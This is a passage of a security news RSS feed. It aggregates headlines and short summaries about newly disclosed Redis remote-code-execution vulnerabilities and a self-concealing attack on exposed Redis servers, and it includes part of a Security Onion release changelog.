href="https://www.reddit.com/r/linux/comments/1t56b03/lerd_v119_rootlesspodman_local_php_dev_env_for/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Redis Vulnerabilities Enables Remote Code Execution Attacks]]></title>
<description><![CDATA[Five dangerous vulnerabilities in Redis expose Redis Cloud, Redis Software, and all open-source community editions to potential remote code execution, giving authenticated attackers a direct path to compromise affected systems. All require authenticated access to exploit, but successful exploitat...]]></description>
<link>https://tsecurity.de/de/3495810/it-security-nachrichten/critical-redis-vulnerabilities-enables-remote-code-execution-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3495810/it-security-nachrichten/critical-redis-vulnerabilities-enables-remote-code-execution-attacks/</guid>
<pubDate>Thu, 07 May 2026 13:51:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five dangerous vulnerabilities in Redis expose Redis Cloud, Redis Software, and all open-source community editions to potential remote code execution, giving authenticated attackers a direct path to compromise affected systems. All require authenticated access to exploit, but successful exploitation can lead to arbitrary code execution, full system compromise, data exfiltration, or service disruption. The advisory, […]</p>
<p>The post <a href="https://cybersecuritynews.com/redis-vulnerabilities-enables-rce/">Critical Redis Vulnerabilities Enables Remote Code Execution Attacks</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Redis Vulnerabilities Enable Remote Code Execution Attacks]]></title>
<description><![CDATA[Redis has disclosed and patched five security vulnerabilities, four rated High severity, that could allow authenticated attackers to achieve remote code execution (RCE) on affected servers. The advisory, published May 5, 2026, by Redis Chief Information Security Officer Riaz Lakhani, covers CVE-2...]]></description>
<link>https://tsecurity.de/de/3495651/it-security-nachrichten/critical-redis-vulnerabilities-enable-remote-code-execution-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3495651/it-security-nachrichten/critical-redis-vulnerabilities-enable-remote-code-execution-attacks/</guid>
<pubDate>Thu, 07 May 2026 12:54:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Redis has disclosed and patched five security vulnerabilities, four rated High severity, that could allow authenticated attackers to achieve remote code execution (RCE) on affected servers. The advisory, published May 5, 2026, by Redis Chief Information Security Officer Riaz Lakhani, covers CVE-2026-23479, CVE-2026-25243, CVE-2026-25588, CVE-2026-25589, and CVE-2026-23631. Organizations running self-managed Redis deployments are strongly urged […]</p>
<p>The post <a href="https://cyberpress.org/redis-vulnerabilities/">Critical Redis Vulnerabilities Enable Remote Code Execution Attacks</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Redis Security Flaws Expose Servers to Remote Code Execution Risks]]></title>
<description><![CDATA[Redis has disclosed and patched five security vulnerabilities, including four rated High severity, that could allow authenticated attackers to achieve remote code execution (RCE) on affected Redis servers. The advisory, published May 5, 2026, by Redis Chief Information Security Officer…
Read more...]]></description>
<link>https://tsecurity.de/de/3495001/it-security-nachrichten/redis-security-flaws-expose-servers-to-remote-code-execution-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3495001/it-security-nachrichten/redis-security-flaws-expose-servers-to-remote-code-execution-risks/</guid>
<pubDate>Thu, 07 May 2026 09:37:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Redis has disclosed and patched five security vulnerabilities, including four rated High severity, that could allow authenticated attackers to achieve remote code execution (RCE) on affected Redis servers. The advisory, published May 5, 2026, by Redis Chief Information Security Officer…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/redis-security-flaws-expose-servers-to-remote-code-execution-risks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/redis-security-flaws-expose-servers-to-remote-code-execution-risks/">Redis Security Flaws Expose Servers to Remote Code Execution Risks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Redis Security Flaws Expose Servers to Remote Code Execution Risks]]></title>
<description><![CDATA[Redis has disclosed and patched five security vulnerabilities, including four rated High severity, that could allow authenticated attackers to achieve remote code execution (RCE) on affected Redis servers. The advisory, published May 5, 2026, by Redis Chief Information Security Officer Riaz Lakha...]]></description>
<link>https://tsecurity.de/de/3494975/it-security-nachrichten/redis-security-flaws-expose-servers-to-remote-code-execution-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3494975/it-security-nachrichten/redis-security-flaws-expose-servers-to-remote-code-execution-risks/</guid>
<pubDate>Thu, 07 May 2026 09:23:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Redis has disclosed and patched five security vulnerabilities, including four rated High severity, that could allow authenticated attackers to achieve remote code execution (RCE) on affected Redis servers. The advisory, published May 5, 2026, by Redis Chief Information Security Officer Riaz Lakhani, covers CVE-2026-23479, CVE-2026-25243, CVE-2026-25588, CVE-2026-25589, and CVE-2026-23631. Redis Security Flaws Expose Servers CVE-2026-23479 […]</p>
<p>The post <a href="https://gbhackers.com/redis-security-flaws-expose-servers/">Redis Security Flaws Expose Servers to Remote Code Execution Risks</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your Redis Server Looks Fine. That’s the Problem.]]></title>
<description><![CDATA[Introduction There’s an automated attack circulating right now that breaks into unprotected Redis servers, takes over the underlying machine, and then carefully puts everything back the way it found it. It restores the database filename. It deletes the tools it used. It detaches from the connecti...]]></description>
<link>https://tsecurity.de/de/3494260/it-security-nachrichten/your-redis-server-looks-fine-thats-the-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3494260/it-security-nachrichten/your-redis-server-looks-fine-thats-the-problem/</guid>
<pubDate>Thu, 07 May 2026 02:08:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Introduction There’s an automated attack circulating right now that breaks into unprotected Redis servers, takes over the underlying machine, and then carefully puts everything back the way it found it. It restores the database filename. It deletes the tools it used. It detaches from the connections it opened. When it’s done, the server looks healthy. […]</p>
<p>The post <a href="https://www.imperva.com/blog/your-redis-server-looks-fine-thats-the-problem/">Your Redis Server Looks Fine. That’s the Problem.</a> appeared first on <a href="https://www.imperva.com/blog">Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your Redis Server Looks Fine. That’s the Problem.]]></title>
<description><![CDATA[Introduction There’s an automated attack circulating right now that breaks into unprotected Redis servers, takes over the underlying machine, and then carefully puts everything back the way it found it. It restores the database filename. It deletes the tools it…
Read more →
The post Your Redis Se...]]></description>
<link>https://tsecurity.de/de/3493974/it-security-nachrichten/your-redis-server-looks-fine-thats-the-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3493974/it-security-nachrichten/your-redis-server-looks-fine-thats-the-problem/</guid>
<pubDate>Wed, 06 May 2026 22:38:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Introduction There’s an automated attack circulating right now that breaks into unprotected Redis servers, takes over the underlying machine, and then carefully puts everything back the way it found it. It restores the database filename. It deletes the tools it…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/your-redis-server-looks-fine-thats-the-problem/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/your-redis-server-looks-fine-thats-the-problem/">Your Redis Server Looks Fine. That’s the Problem.</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Redis: Mehrere Schwachstellen ermöglichen Ausführen von beliebigem Programmcode]]></title>
<description><![CDATA[Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in Redis ausnutzen, um beliebigen Programmcode.]]></description>
<link>https://tsecurity.de/de/3492345/it-security-nachrichten/neu-mittel-redis-mehrere-schwachstellen-ermoeglichen-ausfuehren-von-beliebigem-programmcode/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3492345/it-security-nachrichten/neu-mittel-redis-mehrere-schwachstellen-ermoeglichen-ausfuehren-von-beliebigem-programmcode/</guid>
<pubDate>Wed, 06 May 2026 12:53:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in Redis ausnutzen, um beliebigen Programmcode.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-23479 | Redis up to 8.6.2 Data Structure processCommandAndResetClient use after free (EUVD-2026-27396)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Redis up to 8.6.2. Impacted is the function processCommandAndResetClient of the component Data Structure Handler. This manipulation causes use after free.

This vulnerability is handled as CVE-2026-23479. The attack can be initi...]]></description>
<link>https://tsecurity.de/de/3490662/sicherheitsluecken/cve-2026-23479-redis-up-to-862-data-structure-processcommandandresetclient-use-after-free-euvd-2026-27396/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490662/sicherheitsluecken/cve-2026-23479-redis-up-to-862-data-structure-processcommandandresetclient-use-after-free-euvd-2026-27396/</guid>
<pubDate>Tue, 05 May 2026 21:09:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/redis">Redis up to 8.6.2</a>. Impacted is the function <code>processCommandAndResetClient</code> of the component <em>Data Structure Handler</em>. This manipulation causes use after free.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-23479">CVE-2026-23479</a>. The attack can be initiated remotely. There is not any exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-23631 | Redis up to 8.6.2 Data Structure use after free (EUVD-2026-27398)]]></title>
<description><![CDATA[A vulnerability was found in Redis up to 8.6.2 and classified as critical. This affects an unknown function of the component Data Structure Handler. Executing a manipulation can lead to use after free.

The identification of this vulnerability is CVE-2026-23631. The attack may be launched remotel...]]></description>
<link>https://tsecurity.de/de/3490660/sicherheitsluecken/cve-2026-23631-redis-up-to-862-data-structure-use-after-free-euvd-2026-27398/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490660/sicherheitsluecken/cve-2026-23631-redis-up-to-862-data-structure-use-after-free-euvd-2026-27398/</guid>
<pubDate>Tue, 05 May 2026 21:09:41 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/redis">Redis up to 8.6.2</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown function of the component <em>Data Structure Handler</em>. Executing a manipulation can lead to use after free.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-23631">CVE-2026-23631</a>. The attack may be launched remotely. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[2.4.210-20260302]]></title>
<description><![CDATA[Download the ISO
https://github.com/Security-Onion-Solutions/securityonion/blob/a9d2be8131ac1cf7eb5ee175c1eab20da8cd2b18/DOWNLOAD_AND_VERIFY_ISO.md
What's Changed

Update VERSION by @TOoSmOotH in #15320
Un-Advanced Assistant ApiUrl by @coreyogburn in #15323
expose login form lifespan in config sc...]]></description>
<link>https://tsecurity.de/de/3487965/it-security-tools/24210-20260302/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487965/it-security-tools/24210-20260302/</guid>
<pubDate>Tue, 05 May 2026 02:33:01 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Download the ISO</h2>
<p><a href="https://github.com/Security-Onion-Solutions/securityonion/blob/a9d2be8131ac1cf7eb5ee175c1eab20da8cd2b18/DOWNLOAD_AND_VERIFY_ISO.md">https://github.com/Security-Onion-Solutions/securityonion/blob/a9d2be8131ac1cf7eb5ee175c1eab20da8cd2b18/DOWNLOAD_AND_VERIFY_ISO.md</a></p>
<h2>What's Changed</h2>
<ul>
<li>Update VERSION by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3735481845" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15320" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15320/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15320">#15320</a></li>
<li>Un-Advanced Assistant ApiUrl by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3735981826" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15323" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15323/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15323">#15323</a></li>
<li>expose login form lifespan in config scr by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3760895287" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15347" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15347/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15347">#15347</a></li>
<li>update kratos index template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3782467724" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15353" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15353/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15353">#15353</a></li>
<li>exempt kratos online check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3785405132" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15358" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15358/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15358">#15358</a></li>
<li>suppress config diffs to avoid false positive errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3785985702" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15359" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15359/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15359">#15359</a></li>
<li>Assistant: Session Report Template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3782741249" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15355" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15355/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15355">#15355</a></li>
<li>ES 9.0.8 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789453605" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15363" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15363/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15363">#15363</a></li>
<li>Case Report Update for AI Session Attachments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794092523" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15367" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15367/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15367">#15367</a></li>
<li>Add version 2.4.201 to discussion template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3818892595" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15389" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15389/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15389">#15389</a></li>
<li>Fixmerge201210 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3818915095" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15390" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15390/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15390">#15390</a></li>
<li>2.4.201 into dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3818842834" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15387" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15387/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15387">#15387</a></li>
<li>follow symlinks for docker cp by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3819218514" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15391" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15391/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15391">#15391</a></li>
<li>add additional retries within scripts before salt re-runs the entire … by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3823266897" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15393" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15393/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15393">#15393</a></li>
<li>remove usage of deprecated 'logs' integration in favor of 'filestream' by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3823283151" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15394" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15394/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15394">#15394</a></li>
<li>Fstes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3824001482" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15397" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15397/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15397">#15397</a></li>
<li>break out ssl state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3831366260" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15400" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15400/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15400">#15400</a></li>
<li>allow logstash.ssl for eval and import. fix soup create_ca_pillar by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3834590162" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15402" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15402/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15402">#15402</a></li>
<li>create dir if nonexistent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3835134309" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15405" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15405/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15405">#15405</a></li>
<li>reinstall agent on grid nodes when service wasn't cleanly removed. eg… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3834951590" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15404" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15404/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15404">#15404</a></li>
<li>fix include by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3835534911" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15406" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15406/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15406">#15406</a></li>
<li>more better by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3835541007" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15407" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15407/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15407">#15407</a></li>
<li>fix kafka state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3839576255" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15408" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15408/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15408">#15408</a></li>
<li>fix auto soup - check for compatible versions and fallback to a known… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3844961010" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15410" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15410/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15410">#15410</a></li>
<li>add retries to so-resources repo pull by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3845025869" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15411" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15411/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15411">#15411</a></li>
<li>missing  updates to variables by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3845056615" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15412" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15412/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15412">#15412</a></li>
<li>ignore kratos file mapping error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3849511115" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15414" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15414/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15414">#15414</a></li>
<li>exclude known error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3861987346" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15420" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15420/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15420">#15420</a></li>
<li>update redis log file path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862747465" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15424" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15424/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15424">#15424</a></li>
